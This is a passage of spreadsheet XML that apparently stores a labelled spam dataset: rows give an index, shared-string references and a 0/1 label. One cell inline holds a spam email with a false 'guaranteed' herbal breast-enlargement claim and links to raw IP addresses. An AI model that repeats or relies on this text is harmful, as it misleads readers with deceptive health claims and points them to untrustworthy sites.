      <c r="A287" s="1">
        <v>285.0</v>
      </c>
      <c r="B287" s="1" t="s">
        <v>78</v>
      </c>
      <c r="C287" s="1" t="s">
        <v>544</v>
      </c>
      <c r="D287" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="288" hidden="1">
      <c r="A288" s="1">
        <v>286.0</v>
      </c>
      <c r="B288" s="1" t="s">
        <v>545</v>
      </c>
      <c r="C288" s="1" t="s">
        <v>546</v>
      </c>
      <c r="D288" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="1">
        <v>287.0</v>
      </c>
      <c r="B289" s="1" t="s">
        <v>547</v>
      </c>
      <c r="C289" s="1" t="s">
        <v>548</v>
      </c>
      <c r="D289" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="290" hidden="1">
      <c r="A290" s="1">
        <v>288.0</v>
      </c>
      <c r="B290" s="1" t="s">
        <v>549</v>
      </c>
      <c r="C290" s="1" t="s">
        <v>550</v>
      </c>
      <c r="D290" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="291" hidden="1">
      <c r="A291" s="1">
        <v>289.0</v>
      </c>
      <c r="B291" s="1" t="s">
        <v>551</v>
      </c>
      <c r="C291" s="1" t="s">
        <v>552</v>
      </c>
      <c r="D291" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="292" hidden="1">
      <c r="A292" s="1">
        <v>290.0</v>
      </c>
      <c r="B292" s="1" t="s">
        <v>553</v>
      </c>
      <c r="C292" s="1" t="s">
        <v>554</v>
      </c>
      <c r="D292" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="1">
        <v>291.0</v>
      </c>
      <c r="B293" s="1" t="s">
        <v>555</v>
      </c>
      <c r="C293" s="1" t="s">
        <v>556</v>
      </c>
      <c r="D293" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="1">
        <v>292.0</v>
      </c>
      <c r="B294" s="1" t="s">
        <v>557</v>
      </c>
      <c r="C294" s="1" t="s">
        <v>558</v>
      </c>
      <c r="D294" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="295" hidden="1">
      <c r="A295" s="1">
        <v>293.0</v>
      </c>
      <c r="B295" s="1" t="s">
        <v>559</v>
      </c>
      <c r="C295" s="1" t="s">
        <v>560</v>
      </c>
      <c r="D295" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="296" hidden="1">
      <c r="A296" s="1">
        <v>294.0</v>
      </c>
      <c r="B296" s="1" t="s">
        <v>561</v>
      </c>
      <c r="C296" s="1" t="s">
        <v>562</v>
      </c>
      <c r="D296" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="1">
        <v>295.0</v>
      </c>
      <c r="B297" s="1" t="s">
        <v>547</v>
      </c>
      <c r="C297" s="1" t="s">
        <v>548</v>
      </c>
      <c r="D297" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="298" hidden="1">
      <c r="A298" s="1">
        <v>296.0</v>
      </c>
      <c r="B298" s="1" t="s">
        <v>563</v>
      </c>
      <c r="C298" s="1" t="s">
        <v>564</v>
      </c>
      <c r="D298" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="299" hidden="1">
      <c r="A299" s="1">
        <v>297.0</v>
      </c>
      <c r="B299" s="1" t="s">
        <v>565</v>
      </c>
      <c r="C299" s="1" t="s">
        <v>566</v>
      </c>
      <c r="D299" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="300" hidden="1">
      <c r="A300" s="1">
        <v>298.0</v>
      </c>
      <c r="B300" s="1" t="s">
        <v>567</v>
      </c>
      <c r="C300" s="1" t="s">
        <v>568</v>
      </c>
      <c r="D300" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="301" hidden="1">
      <c r="A301" s="1">
        <v>299.0</v>
      </c>
      <c r="B301" s="1" t="s">
        <v>569</v>
      </c>
      <c r="C301" s="1" t="s">
        <v>570</v>
      </c>
      <c r="D301" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="1">
        <v>300.0</v>
      </c>
      <c r="B302" s="1" t="s">
        <v>571</v>
      </c>
      <c r="C302" s="1" t="s">
        <v>572</v>
      </c>
      <c r="D302" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="303" hidden="1">
      <c r="A303" s="1">
        <v>301.0</v>
      </c>
      <c r="B303" s="1" t="s">
        <v>573</v>
      </c>
      <c r="C303" s="1" t="s">
        <v>574</v>
      </c>
      <c r="D303" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="304" hidden="1">
      <c r="A304" s="1">
        <v>302.0</v>
      </c>
      <c r="B304" s="1" t="s">
        <v>575</v>
      </c>
      <c r="C304" s="1" t="s">
        <v>576</v>
      </c>
      <c r="D304" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="305" hidden="1">
      <c r="A305" s="1">
        <v>303.0</v>
      </c>
      <c r="B305" s="1" t="s">
        <v>577</v>
      </c>
      <c r="C305" s="1" t="s">
        <v>578</v>
      </c>
      <c r="D305" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="306" hidden="1">
      <c r="A306" s="1">
        <v>304.0</v>
      </c>
      <c r="B306" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C306" s="1" t="s">
        <v>579</v>
      </c>
      <c r="D306" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="307" hidden="1">
      <c r="A307" s="1">
        <v>305.0</v>
      </c>
      <c r="B307" s="1" t="s">
        <v>580</v>
      </c>
      <c r="C307" s="1" t="s">
        <v>581</v>
      </c>
      <c r="D307" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="308" hidden="1">
      <c r="A308" s="1">
        <v>306.0</v>
      </c>
      <c r="B308" s="1" t="s">
        <v>582</v>
      </c>
      <c r="C308" s="1" t="s">
        <v>583</v>
      </c>
      <c r="D308" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="309" hidden="1">
      <c r="A309" s="1">
        <v>307.0</v>
      </c>
      <c r="B309" s="1" t="s">
        <v>584</v>
      </c>
      <c r="C309" s="1" t="s">
        <v>585</v>
      </c>
      <c r="D309" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="1">
        <v>308.0</v>
      </c>
      <c r="B310" s="1" t="s">
        <v>586</v>
      </c>
      <c r="C310" s="1" t="s">
        <v>587</v>
      </c>
      <c r="D310" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="311" hidden="1">
      <c r="A311" s="1">
        <v>309.0</v>
      </c>
      <c r="B311" s="1" t="s">
        <v>458</v>
      </c>
      <c r="C311" s="1" t="s">
        <v>588</v>
      </c>
      <c r="D311" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="312" hidden="1">
      <c r="A312" s="1">
        <v>310.0</v>
      </c>
      <c r="B312" s="1" t="s">
        <v>589</v>
      </c>
      <c r="C312" s="1" t="s">
        <v>590</v>
      </c>
      <c r="D312" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="1">
        <v>311.0</v>
      </c>
      <c r="B313" s="1" t="s">
        <v>591</v>
      </c>
      <c r="C313" s="1" t="s">
        <v>592</v>
      </c>
      <c r="D313" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="1">
        <v>312.0</v>
      </c>
      <c r="B314" s="1" t="s">
        <v>593</v>
      </c>
      <c r="C314" s="1" t="s">
        <v>594</v>
      </c>
      <c r="D314" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="315" hidden="1">
      <c r="A315" s="1">
        <v>313.0</v>
      </c>
      <c r="B315" s="1" t="s">
        <v>595</v>
      </c>
      <c r="C315" s="1" t="s">
        <v>596</v>
      </c>
      <c r="D315" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="316" hidden="1">
      <c r="A316" s="1">
        <v>314.0</v>
      </c>
      <c r="B316" s="1" t="s">
        <v>597</v>
      </c>
      <c r="C316" s="1" t="s">
        <v>598</v>
      </c>
      <c r="D316" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="317" hidden="1">
      <c r="A317" s="1">
        <v>315.0</v>
      </c>
      <c r="B317" s="1" t="s">
        <v>599</v>
      </c>
      <c r="C317" s="1" t="s">
        <v>600</v>
      </c>
      <c r="D317" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="318" hidden="1">
      <c r="A318" s="1">
        <v>316.0</v>
      </c>
      <c r="B318" s="1" t="s">
        <v>601</v>
      </c>
      <c r="C318" s="1" t="s">
        <v>602</v>
      </c>
      <c r="D318" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="319" hidden="1">
      <c r="A319" s="1">
        <v>317.0</v>
      </c>
      <c r="B319" s="1" t="s">
        <v>603</v>
      </c>
      <c r="C319" s="1" t="s">
        <v>604</v>
      </c>
      <c r="D319" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="320" hidden="1">
      <c r="A320" s="1">
        <v>318.0</v>
      </c>
      <c r="B320" s="1" t="s">
        <v>605</v>
      </c>
      <c r="C320" s="1" t="s">
        <v>606</v>
      </c>
      <c r="D320" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="321" hidden="1">
      <c r="A321" s="1">
        <v>319.0</v>
      </c>
      <c r="B321" s="1" t="s">
        <v>607</v>
      </c>
      <c r="C321" s="1" t="s">
        <v>608</v>
      </c>
      <c r="D321" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="322" hidden="1">
      <c r="A322" s="1">
        <v>320.0</v>
      </c>
      <c r="B322" s="1" t="s">
        <v>609</v>
      </c>
      <c r="C322" s="1" t="s">
        <v>610</v>
      </c>
      <c r="D322" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="323" hidden="1">
      <c r="A323" s="1">
        <v>321.0</v>
      </c>
      <c r="B323" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C323" s="1" t="s">
        <v>611</v>
      </c>
      <c r="D323" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="1">
        <v>322.0</v>
      </c>
      <c r="B324" s="1" t="s">
        <v>612</v>
      </c>
      <c r="C324" s="1" t="s">
        <v>613</v>
      </c>
      <c r="D324" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="325" hidden="1">
      <c r="A325" s="1">
        <v>323.0</v>
      </c>
      <c r="B325" s="1" t="s">
        <v>614</v>
      </c>
      <c r="C325" s="1" t="s">
        <v>615</v>
      </c>
      <c r="D325" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="1">
        <v>324.0</v>
      </c>
      <c r="B326" s="1" t="s">
        <v>616</v>
      </c>
      <c r="C326" s="1" t="s">
        <v>617</v>
      </c>
      <c r="D326" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="327" hidden="1">
      <c r="A327" s="1">
        <v>325.0</v>
      </c>
      <c r="B327" s="1" t="s">
        <v>618</v>
      </c>
      <c r="C327" s="1" t="s">
        <v>619</v>
      </c>
      <c r="D327" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="1">
        <v>326.0</v>
      </c>
      <c r="B328" s="1" t="s">
        <v>620</v>
      </c>
      <c r="C328" s="1" t="s">
        <v>621</v>
      </c>
      <c r="D328" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="1">
        <v>327.0</v>
      </c>
      <c r="B329" s="1" t="s">
        <v>622</v>
      </c>
      <c r="C329" s="1" t="s">
        <v>623</v>
      </c>
      <c r="D329" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="330" hidden="1">
      <c r="A330" s="1">
        <v>328.0</v>
      </c>
      <c r="B330" s="1" t="s">
        <v>624</v>
      </c>
      <c r="C330" s="1" t="s">
        <v>625</v>
      </c>
      <c r="D330" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="331" hidden="1">
      <c r="A331" s="1">
        <v>329.0</v>
      </c>
      <c r="B331" s="1" t="s">
        <v>626</v>
      </c>
      <c r="C331" s="1" t="s">
        <v>627</v>
      </c>
      <c r="D331" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="1">
        <v>330.0</v>
      </c>
      <c r="B332" s="1" t="s">
        <v>628</v>
      </c>
      <c r="C332" s="1" t="s">
        <v>629</v>
      </c>
      <c r="D332" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="333" hidden="1">
      <c r="A333" s="1">
        <v>331.0</v>
      </c>
      <c r="B333" s="1" t="s">
        <v>630</v>
      </c>
      <c r="C333" s="1" t="s">
        <v>631</v>
      </c>
      <c r="D333" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="334" hidden="1">
      <c r="A334" s="1">
        <v>332.0</v>
      </c>
      <c r="B334" s="1" t="s">
        <v>632</v>
      </c>
      <c r="C334" s="1" t="s">
        <v>633</v>
      </c>
      <c r="D334" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="335" hidden="1">
      <c r="A335" s="1">
        <v>333.0</v>
      </c>
      <c r="B335" s="1" t="s">
        <v>634</v>
      </c>
      <c r="C335" s="1" t="s">
        <v>635</v>
      </c>
      <c r="D335" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="336" hidden="1">
      <c r="A336" s="1">
        <v>334.0</v>
      </c>
      <c r="B336" s="1" t="s">
        <v>636</v>
      </c>
      <c r="C336" s="1" t="s">
        <v>637</v>
      </c>
      <c r="D336" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="337" hidden="1">
      <c r="A337" s="1">
        <v>335.0</v>
      </c>
      <c r="B337" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C337" s="1" t="s">
        <v>638</v>
      </c>
      <c r="D337" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="338" hidden="1">
      <c r="A338" s="1">
        <v>336.0</v>
      </c>
      <c r="B338" s="1" t="s">
        <v>639</v>
      </c>
      <c r="C338" s="1" t="s">
        <v>640</v>
      </c>
      <c r="D338" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="1">
        <v>337.0</v>
      </c>
      <c r="B339" s="1" t="s">
        <v>641</v>
      </c>
      <c r="C339" s="1" t="s">
        <v>642</v>
      </c>
      <c r="D339" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="1">
        <v>338.0</v>
      </c>
      <c r="B340" s="1" t="s">
        <v>643</v>
      </c>
      <c r="C340" s="1" t="s">
        <v>644</v>
      </c>
      <c r="D340" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="341" hidden="1">
      <c r="A341" s="1">
        <v>339.0</v>
      </c>
      <c r="B341" s="1" t="s">
        <v>645</v>
      </c>
      <c r="C341" s="1" t="s">
        <v>646</v>
      </c>
      <c r="D341" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="1">
        <v>340.0</v>
      </c>
      <c r="B342" s="1" t="s">
        <v>647</v>
      </c>
      <c r="C342" s="1" t="s">
        <v>648</v>
      </c>
      <c r="D342" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="1">
        <v>341.0</v>
      </c>
      <c r="B343" s="1" t="s">
        <v>649</v>
      </c>
      <c r="C343" s="1" t="s">
        <v>650</v>
      </c>
      <c r="D343" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="344" hidden="1">
      <c r="A344" s="1">
        <v>342.0</v>
      </c>
      <c r="B344" s="1" t="s">
        <v>651</v>
      </c>
      <c r="C344" s="1" t="s">
        <v>652</v>
      </c>
      <c r="D344" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="1">
        <v>343.0</v>
      </c>
      <c r="B345" s="1" t="s">
        <v>653</v>
      </c>
      <c r="C345" s="1" t="s">
        <v>654</v>
      </c>
      <c r="D345" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="346" hidden="1">
      <c r="A346" s="1">
        <v>344.0</v>
      </c>
      <c r="B346" s="1" t="s">
        <v>655</v>
      </c>
      <c r="C346" s="1" t="s">
        <v>656</v>
      </c>
      <c r="D346" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="347" hidden="1">
      <c r="A347" s="1">
        <v>345.0</v>
      </c>
      <c r="B347" s="1" t="s">
        <v>657</v>
      </c>
      <c r="C347" s="1" t="s">
        <v>658</v>
      </c>
      <c r="D347" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="1">
        <v>346.0</v>
      </c>
      <c r="B348" s="1" t="s">
        <v>659</v>
      </c>
      <c r="C348" s="1" t="s">
        <v>660</v>
      </c>
      <c r="D348" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="1">
        <v>347.0</v>
      </c>
      <c r="B349" s="1" t="s">
        <v>661</v>
      </c>
      <c r="C349" s="1" t="s">
        <v>662</v>
      </c>
      <c r="D349" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="350" hidden="1">
      <c r="A350" s="1">
        <v>348.0</v>
      </c>
      <c r="B350" s="1" t="s">
        <v>663</v>
      </c>
      <c r="C350" s="1" t="s">
        <v>664</v>
      </c>
      <c r="D350" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="351" hidden="1">
      <c r="A351" s="1">
        <v>349.0</v>
      </c>
      <c r="B351" s="1" t="s">
        <v>665</v>
      </c>
      <c r="C351" s="1" t="s">
        <v>666</v>
      </c>
      <c r="D351" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="352" hidden="1">
      <c r="A352" s="1">
        <v>350.0</v>
      </c>
      <c r="B352" s="1" t="s">
        <v>667</v>
      </c>
      <c r="C352" s="1" t="s">
        <v>668</v>
      </c>
      <c r="D352" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="353" hidden="1">
      <c r="A353" s="1">
        <v>351.0</v>
      </c>
      <c r="B353" s="1" t="s">
        <v>669</v>
      </c>
      <c r="C353" s="1" t="s">
        <v>670</v>
      </c>
      <c r="D353" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="1">
        <v>352.0</v>
      </c>
      <c r="B354" s="1" t="s">
        <v>671</v>
      </c>
      <c r="C354" s="1" t="s">
        <v>672</v>
      </c>
      <c r="D354" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="1">
        <v>353.0</v>
      </c>
      <c r="B355" s="1" t="s">
        <v>673</v>
      </c>
      <c r="C355" s="3" t="str">
        <f>================================
 Guaranteed to increase, lift and firm your
 breasts in 60 days or your money back!!
 100% herbal and natural.  Proven formula since 
 1996.  Increase  your bust by 1 to 3 sizes within 30-60 
 days and be all natural.  
 Click here:
 http://202.101.163.34:81/li/wangxd/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http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=ilug@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D355" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="1">
        <v>354.0</v>
      </c>
      <c r="B356" s="1" t="s">
        <v>674</v>
      </c>
      <c r="C356" s="1" t="s">
        <v>675</v>
      </c>
      <c r="D356" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="357" hidden="1">
      <c r="A357" s="1">
        <v>355.0</v>
      </c>
      <c r="B357" s="1" t="s">
        <v>676</v>
      </c>
      <c r="C357" s="1" t="s">
        <v>677</v>
      </c>
      <c r="D357" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="358" hidden="1">
      <c r="A358" s="1">
        <v>356.0</v>
      </c>
      <c r="B358" s="1" t="s">
        <v>678</v>
      </c>
      <c r="C358" s="1" t="s">
        <v>679</v>
      </c>
      <c r="D358" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="359" hidden="1">
      <c r="A359" s="1">
        <v>357.0</v>
      </c>
      <c r="B359" s="1" t="s">
        <v>680</v>
      </c>
      <c r="C359" s="1" t="s">
        <v>681</v>
      </c>
      <c r="D359" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="1">
        <v>358.0</v>
      </c>
      <c r="B360" s="1" t="s">
        <v>682</v>
      </c>
      <c r="C360" s="1" t="s">
        <v>683</v>
      </c>
      <c r="D360" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="1">
        <v>359.0</v>
      </c>
      <c r="B361" s="1" t="s">
        <v>684</v>
      </c>
      <c r="C361" s="1" t="s">
        <v>685</v>
      </c>
      <c r="D361" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="362" hidden="1">
      <c r="A362" s="1">
        <v>360.0</v>
      </c>
      <c r="B362" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C362" s="1" t="s">
        <v>190</v>
      </c>
      <c r="D362" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="363" hidden="1">
      <c r="A363" s="1">
        <v>361.0</v>
      </c>
      <c r="B363" s="1" t="s">
        <v>686</v>
      </c>
      <c r="C363" s="1" t="s">
        <v>687</v>
      </c>
      <c r="D363" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="364" hidden="1">
      <c r="A364" s="1">
        <v>362.0</v>
      </c>
      <c r="B364" s="1" t="s">
        <v>688</v>
      </c>
      <c r="C364" s="1" t="s">
        <v>689</v>
      </c>
      <c r="D364" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="1">
        <v>363.0</v>
      </c>
      <c r="B365" s="1" t="s">
        <v>690</v>
      </c>
      <c r="C365" s="1" t="s">
        <v>691</v>
      </c>
      <c r="D365" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="1">
        <v>364.0</v>
      </c>
      <c r="B366" s="1" t="s">
        <v>692</v>
      </c>
      <c r="C366" s="1" t="s">
        <v>693</v>
      </c>
      <c r="D366" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="1">
        <v>365.0</v>
      </c>
      <c r="B367" s="1" t="s">
        <v>694</v>
      </c>
      <c r="C367" s="1" t="s">
        <v>695</v>
      </c>
      <c r="D367" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="1">
        <v>366.0</v>
      </c>
      <c r="B368" s="1" t="s">
        <v>696</v>
      </c>
      <c r="C368" s="1" t="s">
        <v>697</v>
      </c>
      <c r="D368" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="1">
        <v>367.0</v>
      </c>
      <c r="B369" s="1" t="s">
        <v>698</v>
      </c>
      <c r="C369" s="1" t="s">
        <v>699</v>
      </c>
      <c r="D369" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="1">
        <v>368.0</v>
      </c>
      <c r="B370" s="1" t="s">
        <v>700</v>
      </c>
      <c r="C370" s="1" t="s">
        <v>701</v>
      </c>
      <c r="D370" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="371" hidden="1">
      <c r="A371" s="1">
        <v>369.0</v>
      </c>
      <c r="B371" s="1" t="s">
        <v>702</v>
      </c>
      <c r="C371" s="1" t="s">
        <v>703</v>
      </c>
      <c r="D371" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="372" hidden="1">
      <c r="A372" s="1">
        <v>370.0</v>
      </c>
      <c r="B372" s="1" t="s">
        <v>655</v>
      </c>
      <c r="C372" s="1" t="s">
        <v>704</v>
      </c>
      <c r="D372" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="373" hidden="1">
      <c r="A373" s="1">
        <v>371.0</v>
      </c>
      <c r="B373" s="1" t="s">
        <v>705</v>
      </c>
      <c r="C373" s="1" t="s">
        <v>706</v>
      </c>
      <c r="D373" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="374" hidden="1">
      <c r="A374" s="1">
        <v>372.0</v>
      </c>
      <c r="B374" s="1" t="s">
        <v>707</v>
      </c>
      <c r="C374" s="1" t="s">
        <v>708</v>
      </c>
      <c r="D374" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="1">
        <v>373.0</v>
      </c>
      <c r="B375" s="1" t="s">
        <v>709</v>
      </c>
      <c r="C375" s="1" t="s">
        <v>710</v>
      </c>
      <c r="D375" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="376" hidden="1">
      <c r="A376" s="1">
        <v>374.0</v>
      </c>
      <c r="B376" s="1" t="s">
        <v>711</v>
      </c>
      <c r="C376" s="1" t="s">
        <v>712</v>
      </c>
      <c r="D376" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="377" hidden="1">
      <c r="A377" s="1">
        <v>375.0</v>
      </c>
      <c r="B377" s="1" t="s">
        <v>713</v>
      </c>
      <c r="C377" s="1" t="s">
        <v>714</v>
      </c>
      <c r="D377" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="378" hidden="1">
      <c r="A378" s="1">
        <v>376.0</v>
      </c>
      <c r="B378" s="1" t="s">
        <v>715</v>
      </c>
      <c r="C378" s="1" t="s">
        <v>716</v>
      </c>
      <c r="D378" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="379" hidden="1">
      <c r="A379" s="1">
        <v>377.0</v>
      </c>
      <c r="B379" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C379" s="1" t="s">
        <v>717</v>
      </c>
      <c r="D379" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="380" hidden="1">
      <c r="A380" s="1">
        <v>378.0</v>
      </c>
      <c r="B380" s="1" t="s">
        <v>718</v>
      </c>
      <c r="C380" s="1" t="s">
        <v>719</v>
      </c>
      <c r="D380" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="1">
        <v>379.0</v>
      </c>
      <c r="B381" s="1" t="s">
        <v>720</v>
      </c>
      <c r="C381" s="1" t="s">
        <v>721</v>
      </c>
      <c r="D381" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="1">
        <v>380.0</v>
      </c>
      <c r="B382" s="1" t="s">
        <v>722</v>
      </c>
      <c r="C382" s="1" t="s">
        <v>723</v>
      </c>
      <c r="D382" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="383" hidden="1">
      <c r="A383" s="1">
        <v>381.0</v>
      </c>
      <c r="B383" s="1" t="s">
        <v>724</v>
      </c>
      <c r="C383" s="1" t="s">
        <v>725</v>
      </c>
      <c r="D383" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="384" hidden="1">
      <c r="A384" s="1">
        <v>382.0</v>
      </c>
      <c r="B384" s="1" t="s">
        <v>726</v>
      </c>
      <c r="C384" s="1" t="s">
        <v>727</v>
      </c>
      <c r="D384" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="385" hidden="1">
      <c r="A385" s="1">
        <v>383.0</v>
      </c>
      <c r="B385" s="1" t="s">
        <v>728</v>
      </c>
      <c r="C385" s="1" t="s">
        <v>729</v>
      </c>
      <c r="D385" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="1">
        <v>384.0</v>
      </c>
      <c r="B386" s="1" t="s">
        <v>730</v>
      </c>
      <c r="C386" s="1" t="s">
        <v>731</v>
      </c>
      <c r="D386" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="387" hidden="1">
      <c r="A387" s="1">
        <v>385.0</v>
      </c>
      <c r="B387" s="1" t="s">
        <v>210</v>
      </c>
      <c r="C387" s="1" t="s">
        <v>732</v>
      </c>
      <c r="D387" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="388" hidden="1">
      <c r="A388" s="1">
        <v>386.0</v>
      </c>
      <c r="B388" s="1" t="s">
        <v>733</v>
      </c>
      <c r="C388" s="1" t="s">
        <v>734</v>
      </c>
      <c r="D388" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="389" hidden="1">
      <c r="A389" s="1">
        <v>387.0</v>
      </c>
      <c r="B389" s="1" t="s">
        <v>381</v>
      </c>
      <c r="C389" s="1" t="s">
        <v>735</v>
      </c>
      <c r="D389" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="390" hidden="1">
      <c r="A390" s="1">
        <v>388.0</v>
      </c>
      <c r="B390" s="1" t="s">
        <v>736</v>
      </c>
      <c r="C390" s="1" t="s">
        <v>737</v>
      </c>
      <c r="D390" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="1">
        <v>389.0</v>
      </c>
      <c r="B391" s="1" t="s">
        <v>738</v>
      </c>
      <c r="C391" s="1" t="s">
        <v>739</v>
      </c>
      <c r="D391" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="1">
        <v>390.0</v>
      </c>
      <c r="B392" s="1" t="s">
        <v>740</v>
      </c>
      <c r="C392" s="1" t="s">
        <v>741</v>
      </c>
      <c r="D392" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="1">
        <v>391.0</v>
      </c>
      <c r="B393" s="1" t="s">
        <v>742</v>
      </c>
      <c r="C393" s="1" t="s">
        <v>743</v>
      </c>
      <c r="D393" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="394" hidden="1">
      <c r="A394" s="1">
        <v>392.0</v>
      </c>
      <c r="B394" s="1" t="s">
        <v>124</v>
      </c>
      <c r="C394" s="1" t="s">
        <v>744</v>
      </c>
